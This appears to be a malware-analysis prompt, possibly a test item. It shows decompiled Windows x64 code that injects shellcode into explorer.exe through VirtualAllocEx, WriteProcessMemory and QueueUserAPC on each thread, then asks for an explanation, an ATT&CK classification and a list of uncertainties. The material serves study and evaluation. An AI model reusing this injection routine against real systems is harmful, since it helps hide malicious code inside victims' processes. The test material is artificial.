APC Analysis

Prompt

Here is decompiled code from a Windows x64 sample: undefined8 FUN_140008d50(undefined8 param_1,undefined8 param_2,ulonglong param_3,undefined8 param_4) { BOOL BVar1; DWORD DVar2; int iVar3; DWORD DVar4; uint uVar5; HANDLE hProcess; PAPCFUNC pfnAPC; HANDLE hObject; HANDLE hThread; FILE *pFVar6; char *pcVar7; ulonglong uVar8; undefined *puVar9; undefined8 uVar10; undefined4 local_58 [2]; uint local_50; DWORD local_4c; FUN_140001790(); hProcess = FUN_140001490(L"explorer.exe",param_2,param_3,param_4); if (hProcess == (HANDLE)0x0) { pFVar6 = (FILE *)(*(code *)PTR_FUN_140009e50)(2); FUN_140002960(pFVar6,(byte *)"Could not open target process.\n",param_3,param_4); } else { uVar10 = 0x3000; uVar8 = 0xd43; pfnAPC = VirtualAllocEx(hProcess,(LPVOID)0x0,0xd43,0x3000,0x40); if (pfnAPC == (PAPCFUNC)0x0) { pFVar6 = (FILE *)(*(code *)PTR_FUN_140009e50)(2); FUN_140002960(pFVar6,(byte *)"Failed to allocate memory in target process.\n",uVar8,uVar10); CloseHandle(hProcess); } else { uVar10 = 0xd43; puVar9 = &DAT_140009000; BVar1 = WriteProcessMemory(hProcess,pfnAPC,&DAT_140009000,0xd43,(SIZE_T *)0x0); if (BVar1 == 0) { pFVar6 = (FILE *)(*(code *)PTR_FUN_140009e50)(2); pcVar7 = "Failed to write shellcode to target process.\n"; } else { DVar2 = GetProcessId(hProcess); hObject = (HANDLE)CreateToolhelp32Snapshot(4,0); if (hObject != (HANDLE)0xffffffffffffffff) { local_58[0] = 0x1c; iVar3 = Thread32First(hObject,local_58); if (iVar3 == 0) { CloseHandle(hObject); } else { uVar5 = 0; do { if (local_4c == DVar2) { puVar9 = (undefined *)(ulonglong)local_50; hThread = OpenThread(0x10,0,local_50); if (hThread != (HANDLE)0x0) { puVar9 = (undefined *)0x0; DVar4 = QueueUserAPC(pfnAPC,hThread,0); uVar5 = (uVar5 + 1) - (uint)(DVar4 == 0); CloseHandle(hThread); } } iVar3 = Thread32Next(hObject); } while (iVar3 != 0); CloseHandle(hObject); if (uVar5 != 0) { pFVar6 = (FILE *)(*(code *)PTR_FUN_140009e50)(1); FUN_140002960(pFVar6,(byte *)"APC queued to %d explorer thread(s). Waiting...\n", (ulonglong)uVar5,uVar10); Sleep(10000); CloseHandle(hProcess); return 0; } } pFVar6 = (FILE *)(*(code *)PTR_FUN_140009e50)(2); FUN_140002960(pFVar6,(byte *)"Failed to queue APC to any thread.\n",(ulonglong)puVar9, uVar10); VirtualFreeEx(hProcess,pfnAPC,0,0x8000); CloseHandle(hProcess); return 1; } pFVar6 = (FILE *)(*(code *)PTR_FUN_140009e50)(2); pcVar7 = "Failed to create thread snapshot.\n"; } FUN_140002960(pFVar6,(byte *)pcVar7,(ulonglong)puVar9,uVar10); VirtualFreeEx(hProcess,pfnAPC,0,0x8000); CloseHandle(hProcess); } } return 1; } 1. Explain what this does, step by step. 2. Classify the technique (name it, and give the MITRE ATT&CK ID). 3. What does this function NOT do? (persistence, network, anti-analysis, etc.) 4. How many target processes/threads does it affect? 5. List anything you're unsure about instead of guessing.

Drag to resize
Drag to resize
Drag to resize